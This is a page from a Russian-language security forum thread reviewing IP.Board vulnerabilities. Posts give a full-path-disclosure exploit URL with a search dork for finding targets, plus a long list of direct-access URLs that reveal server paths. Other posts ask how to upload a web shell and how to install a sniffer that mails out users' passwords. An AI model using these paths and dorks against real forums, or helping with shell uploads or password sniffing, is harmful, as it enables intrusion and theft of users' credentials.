HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей IPB]
   
Ответ
Страница 7 из 9 « Первая < 3 4 5 6 7 8 9 >
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 17.12.2012, 01:57
n0n@me
Новичок
Регистрация: 19.02.2010
Сообщений: 1
Провел на форуме:
12389

Репутация: 6
По умолчанию
IPBoard 3.x.x/3.4 Full Path Disclosure

Код:
Code:
Exploit: admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login   
Dork:  intext:Community Forum Software by IP.Board   
Fix:  Turn off display_errors in php.ini
//...Leaked bY beBoss..//
 
Ответить с цитированием

  #62  
Старый 26.12.2012, 10:23
SPUTNIK
Новичок
Регистрация: 15.02.2006
Сообщений: 0
Провел на форуме:
87311

Репутация: 0
По умолчанию
IPBoard 3.x.x/3.4 Full Path Disclosure

Код:
Code:
http://localhost/forum/admin//setup/templates/skin_setup.php
http://localhost/forum/admin//setup/cli/output.php
http://localhost/forum/admin//setup/applications/install/sections/
http://localhost/forum/admin//sources/classes/ads.php
http://localhost/forum/admin//sources/classes/archive/reader/sql.php
http://localhost/forum/admin//sources/classes/archive/restore/sql.php
http://localhost/forum/admin//sources/classes/archive/writer/sql.php
http://localhost/forum/admin//sources/classes/bbcode/custom/ccs.php
http://localhost/forum/admin//sources/classes/mapping/engines/bing.php
http://localhost/forum/admin//sources/classes/mapping/engines/google.php
http://localhost/forum/admin//sources/classes/output/adminOutput.php
http://localhost/forum/admin//sources/classes/output/formats/html/htmlOutput.php
http://localhost/forum/admin//sources/classes/output/formats/xml/xmlOutput.php
http://localhost/forum/admin//sources/classes/sabre/directory/templates.php
http://localhost/forum/admin//sources/classes/sabre/directory/groups.php
http://localhost/forum/admin//sources/classes/sabre/files/templates.php
http://localhost/forum/admin//sources/classes/sabre/lock/nolocks.php
http://localhost/forum/admin//sources/classes/sabre/root/skins.php
http://localhost/forum/admin//sources/classes/url/apis/bitly/api.php
http://localhost/forum/admin//sources/classes/url/apis/topic/api.php
http://localhost/forum/admin//sources/loginauth/convert/auth.php
http://localhost/forum/admin//sources/template_plugins/tp_addtohead.php
http://localhost/forum/admin//sources/template_plugins/tp_currency.php
http://localhost/forum/admin//sources/template_plugins/tp_date.php
http://localhost/forum/admin//sources/template_plugins/tp_editor.php
http://localhost/forum/admin//sources/template_plugins/tp_expression.php
http://localhost/forum/admin//sources/template_plugins/tp_format_number.php
http://localhost/forum/admin//sources/template_plugins/tp_include.php
http://localhost/forum/admin//sources/template_plugins/tp_ipcmedia.php
http://localhost/forum/admin//sources/template_plugins/tp_js_module.php
http://localhost/forum/admin//sources/template_plugins/tp_lang.php
http://localhost/forum/admin//sources/template_plugins/tp_replacement.php
http://localhost/forum/admin//sources/template_plugins/tp_resize_image.php
http://localhost/forum/admin//sources/template_plugins/tp_striping.php
http://localhost/forum/admin//sources/template_plugins/tp_template.php
http://localhost/forum/admin//sources/template_plugins/tp_url.php
http://localhost/forum/admin//sources/template_plugins/tp_variable.php
http://localhost/forum/admin//applications/core/setup/versions/install/knownSettings.php
http://localhost/forum/admin//applications/forums/extensions/content/plugin_blocks/site_poll/plugin.php
http://localhost/forum/admin//applications/forums/sql/mysql_topics_queries.php
http://localhost/forum/admin//applications/members/extensions/content/feed_blocks/members.php
http://localhost/forum/admin//applications/members/extensions/content/plugin_blocks/status_updates/plugin.php
http://localhost/forum/admin//applications/members/extensions/content/plugin_blocks/online_friends/plugin.php
http://localhost/forum/admin//applications/members/skin_cp/cp_skin_groups.php
http://localhost/forum/admin/setup/applications/upgrade/sections/
http://localhost/forum/admin/setup/applications/install/sections/
http://localhost/forum/admin/setup/cli/output.php
http://localhost/forum/admin//applications_addon/other/customSidebarBlocks/extensions/coreVariables.php
http://localhost/forum/admin//applications_addon/other/customSidebarBlocks/skin_cp/cp_skin_e_CSB.php
http://localhost/forum/admin//applications_addon/other/portal/skin_cp/cp_skin_portal.php
http://localhost/forum/admin//applications_addon/other/shoutbox/extensions/admin/group_form.php
http://localhost/forum/admin//applications_addon/other/shoutbox/extensions/coreVariables.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_moderators.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_overview.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_shoutbox_group_form.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_tools.php
http://localhost/forum/admin//applications_addon/other/shoutbox/skin_cp/cp_skin_banned.php
http://localhost/forum//interface//twitter/
http://localhost/forum/ips_kernel/classCacheXcache.php
http://localhost/forum/ips_kernel/classDbMysqlClient.php
http://localhost/forum/ips_kernel/classImageImagemagick.php
http://localhost/forum/ips_kernel/facebook-client/facebook_desktop.php
http://localhost/forum/ips_kernel/facebook-client/jsonwrapper/jsonwrapper_inner.php
http://localhost/forum/ips_kernel/pop3class/browse_mailbox.php
http://localhost/forum/ips_kernel/pop3class/parse_message.php
http://localhost/forum/ips_kernel/sabre/Sabre/HTTP/AWSAuth.php
и так далее)

//Когда постишь, проверяй переносы строк

//BigBear
 
Ответить с цитированием

  #63  
Старый 28.12.2012, 12:20
Sirius05
Guest
Сообщений: n/a
Провел на форуме:
2234

Репутация: 0
По умолчанию
как применить эти две уязвимости дляя 3.3х не подскажите
 
Ответить с цитированием

  #64  
Старый 05.01.2013, 21:12
Revi
Guest
Сообщений: n/a
Провел на форуме:
13446

Репутация: 0
По умолчанию
Кто знает как залить шелл на IP.Board 3.3.3?
 
Ответить с цитированием

  #65  
Старый 28.01.2013, 01:15
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Привет всем! Возможно както залить шелл имея права модера?
 
Ответить с цитированием

  #66  
Старый 28.01.2013, 08:16
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от ph1l1ster  
ph1l1ster said:
Привет всем! Возможно както залить шелл имея права модера?
Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
 
Ответить с цитированием

  #67  
Старый 28.01.2013, 12:18
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:
Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
К сожалению нет. В папке с админкой .htaccess и доступ только для определенных IP

Через аттачи не? Заливается но не выполняется. lfi нет
 
Ответить с цитированием

  #68  
Старый 09.02.2013, 23:18
korp
Новичок
Регистрация: 26.09.2008
Сообщений: 29
Провел на форуме:
217224

Репутация: 11
Отправить сообщение для korp с помощью ICQ
По умолчанию
[QUOTE="-=lebed=-"]
-=lebed=- said:
[B][COLOR="Red"]Invision Power Board
 
Ответить с цитированием

  #69  
Старый 14.05.2013, 17:58
CoBecTb
Guest
Сообщений: n/a
Провел на форуме:
3273

Репутация: 0
По умолчанию
Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
 
Ответить с цитированием

  #70  
Старый 29.05.2013, 23:41
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
Мужики, а есть эксплоит под версию 3.4.4

P.S Выдало ошибку PB Предупреждение [2] mysql_connect() [function.mysql-connect]: [2002] No connection could be made because the target machine actively refused it. (trying to connect via tcp://localhost:3306) (Строка: 141 файла \ips_kernel\class_db_mysql.php)

IPB Предупреждение [2] mysql_connect() [function.mysql-connect]: No connection could be made because the target machine actively refused it. (Строка: 141 файла \ips_kernel\class_db_mysql.php)
 
Ответить с цитированием
Ответ
Страница 7 из 9 « Первая < 3 4 5 6 7 8 9 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
[Обзор уязвимостей XMBForum] [x26]VOLAND Уязвимости CMS / форумов 0 19.05.2008 13:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ